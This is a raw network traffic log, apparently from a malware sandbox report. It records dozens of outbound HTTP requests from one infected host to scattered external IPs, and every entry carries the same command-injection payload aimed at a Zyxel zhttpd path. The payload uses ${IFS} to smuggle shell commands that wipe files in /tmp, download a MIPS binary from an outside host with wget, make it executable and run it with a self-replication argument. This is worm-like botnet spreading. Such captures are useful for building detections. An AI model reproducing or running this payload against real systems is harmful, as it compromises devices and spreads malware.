                                                Jan 12, 2024 18:24:36.886439085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4789192.168.2.134242052.106.171.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886480093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4790192.168.2.133899231.102.139.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886504889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4791192.168.2.133543465.125.129.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886554956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4792192.168.2.13591862.233.62.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886588097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4793192.168.2.1353578118.193.136.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886631966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4794192.168.2.1333786183.16.56.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886682987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4795192.168.2.133815089.102.91.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886720896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4796192.168.2.1340520173.47.150.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886737108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4797192.168.2.133744814.136.166.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886795044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4798192.168.2.134280632.249.46.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903584003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4799192.168.2.136093643.227.56.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903623104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4800192.168.2.1348558143.164.249.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903656960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4801192.168.2.135538012.208.13.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903697014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4802192.168.2.1338282114.251.185.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903738976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4803192.168.2.1349474184.145.231.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903784037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4804192.168.2.1352470187.177.171.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903826952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4805192.168.2.134090220.77.89.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903851032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4806192.168.2.1346010187.222.207.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903892994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4807192.168.2.135507061.117.139.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903923035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4808192.168.2.1335302110.52.181.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903963089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4809192.168.2.133658674.51.14.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.903989077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4810192.168.2.1340706102.126.69.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904047012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4811192.168.2.135348852.222.205.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904083967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4812192.168.2.1335842207.12.65.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904115915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4813192.168.2.134674285.62.103.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904159069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4814192.168.2.1356714131.167.129.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904198885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4815192.168.2.1357868181.57.154.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904234886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4816192.168.2.1360042146.53.11.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904266119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4817192.168.2.1338550196.64.233.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904316902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4818192.168.2.1349012199.214.117.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904342890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4819192.168.2.135217488.52.56.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904381037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4820192.168.2.1337338203.213.250.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904426098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4821192.168.2.1354336201.243.249.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904463053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4822192.168.2.133832268.189.65.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904493093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4823192.168.2.135074460.116.251.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904534101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4824192.168.2.1353822190.158.53.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904577971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4825192.168.2.1342278135.227.151.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904640913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4826192.168.2.135291632.173.183.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904664040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4827192.168.2.1355220177.44.30.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904694080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4828192.168.2.134886089.42.172.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904748917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4829192.168.2.135300435.240.119.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904786110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4830192.168.2.1359704154.139.68.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904831886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4831192.168.2.1335118141.210.200.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904877901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4832192.168.2.1339834142.162.0.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904902935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4833192.168.2.135918219.13.158.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904941082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4834192.168.2.1359092223.251.54.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.904995918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4835192.168.2.1340750184.2.98.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905030012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4836192.168.2.1344288188.25.53.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905092001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4837192.168.2.135199281.70.205.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905122042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4838192.168.2.1343458168.43.89.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905167103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4839192.168.2.135078477.222.171.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905216932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4840192.168.2.1354668149.6.167.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905271053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4841192.168.2.134329024.244.178.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905297995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4842192.168.2.133318685.46.137.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905352116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4843192.168.2.133304490.226.0.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905396938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4844192.168.2.1333372149.109.104.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905452013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4845192.168.2.1337290106.229.46.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905483007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4846192.168.2.135941861.199.66.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905529976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4847192.168.2.1345122142.89.45.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905560017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4848192.168.2.1355140204.165.112.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905595064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4849192.168.2.1360704133.252.84.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905647039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4850192.168.2.1333880154.221.203.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905689001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4851192.168.2.1336142166.167.94.195443
                                                TimestampBytes transferredDirectionData
